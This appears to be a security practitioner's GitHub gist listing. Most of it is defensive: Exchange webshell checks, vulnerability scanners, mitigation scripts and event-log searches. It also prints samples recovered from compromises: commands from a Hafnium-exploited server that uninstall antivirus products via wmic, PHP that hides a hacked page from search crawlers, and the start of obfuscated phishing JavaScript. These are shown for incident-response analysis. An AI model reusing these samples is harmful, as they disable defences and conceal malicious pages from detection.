Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
technion / hacked.php
Created December 30, 2021 09:01
hacked php
<?php
// Crawler cloaking: if the User-Agent matches a known search-engine or archive bot,
// answer 404 and stop, so the malicious page is never indexed or archived.
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider");
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
technion / Exchange Version.nse
Created November 17, 2021 22:50
Scan Microsoft Exchange Version for vulnerability
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {""}
license = "Same as Nmap--See"
categories = {"discovery", "safe"}
-- Detection rule based on:
technion / CVE-2021-40444Mit.ps1
Last active September 12, 2021 08:43
CVE-2021-40444 Mitigation Script
Set-StrictMode -Version 2
# Applies reg keys from
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
# Zones 0-3: Local Machine, Local Intranet, Trusted Sites, Internet
for($i = 0; $i -le 3; $i++) {
    $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
    # Create the policy zone key if it does not already exist
    if (-not (Test-Path $RegPath)) {
        New-Item $RegPath -Force
    }
}
technion / AutorunsVT.ps1
Created April 23, 2021 01:05
Review CSV file from autorunsc.exe and handle VirusTotal detections
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
    $detection = $item.'VT detection'
    # Entries with no VirusTotal result (blank or 'Unknown') need manual review
    if ($detection -eq "" -or $detection -eq 'Unknown') {
        Write-Output $detection
    }
}
technion / Malicious.ps1
Created March 20, 2021 09:45
RE on Hafnium exploited server
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / LicenseManagement.ps1
Created November 13, 2020 00:29
Office 365 license management
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
# $user should be populated with
# $user = Get-AzureADUser -ObjectId
technion / tank.wa
Created November 12, 2020 07:04
Warlock tanking weak aura
technion / Scan-Netlogon-Secure.ps1
Last active August 16, 2020 23:30
Search domain controllers for events relating to Netlogon vulnerability
# More information:
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
    # Event IDs 5827-5831 are the Netlogon secure channel enforcement/denial events.
    # Errors are ignored so as not to throw an exception if there are no such logs found
    Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
}
technion / phishing.js
Last active August 12, 2020 03:46
blog of phishing code
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"